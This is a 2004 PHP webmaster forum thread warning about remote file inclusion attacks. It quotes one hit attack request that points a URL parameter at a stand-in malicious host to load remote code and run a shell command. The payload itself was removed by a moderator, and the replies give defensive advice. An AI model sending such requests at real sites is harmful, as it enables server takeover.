homepage Welcome to WebmasterWorld Guest from 184.72.72.182
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library, Charter, Moderators: coopster & jatar k

PHP Server Side Scripting Forum

    
warning: poorly written php exploit
reminder to always protect your code
celenoid




msg:1247752
 11:18 pm on May 23, 2004 (gmt 0)

A new site of mine has been hit repeatedly with the request:

www.mydomain.com/email.php?page=http://nasty-nasty-domain/hkz.txt?&cmd=id

My file "email.php" was designed to read a URL from my website (defined in var 'page') and send it to a requested email address. This hack attempts to fool my site into reading remotely the following code:

<modnote - code removed>

It's too early for me to understand exactly what this code does. Perhaps someone can shed some light on the topic?

While I'm a paranoid coder and this exploit does not work on my site (I check all 'page' variables to ensure they actually exist as a page on my site), a little research shows that other webmasters have been hit with similar hacks that have brought networks to a halt. Again, it has targeted php pages that read local files via the query string (think about all those index.php?include=mypage.php content system designs...)

Just a warning to those using QS file references. Escape variables, check that files exist on your servers, etc.

You can never be too paranoid!

[edited by: jatar_k at 2:24 am (utc) on May 24, 2004]

 

trimmer80




msg:1247753
 12:44 am on May 24, 2004 (gmt 0)

this is a script to allow command execusion on the server. my suggestion, if you have not already done so, is to modify the code slightly so others wont use it.

jatar_k




msg:1247754
 2:27 am on May 24, 2004 (gmt 0)

that code, which we will not post again ;), is specific to My_eGallery for PHPNuke.

the information about it can be found here
Security issues in My_eGallery for PHPNuke [lottasophie.sourceforge.net]

phpnuke has had numerous problems and as mentioned in that article

I do not intend to maintain My_eGallery for PHPNuke

but it would seem that My_eGallery has been fixed.

there is also a mention here
[securityfocus.com...]

Let this serve as a reminder to always patch code, be careful of what packages you install on your server/site and always take all necessary precautions when coding.

celenoid




msg:1247755
 2:55 am on May 24, 2004 (gmt 0)

You're right, I later saw the code reproduced in reference to the 'My_eGallery' problem. Apologies for reproducing it here!

While it affects My_eGallery, I believe it has the potential to exploit any site that reads URL's via the QS. I suspect this is why my site was targeted (I do not run My_eGallery, nor use any unofficial php applications / packages).

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved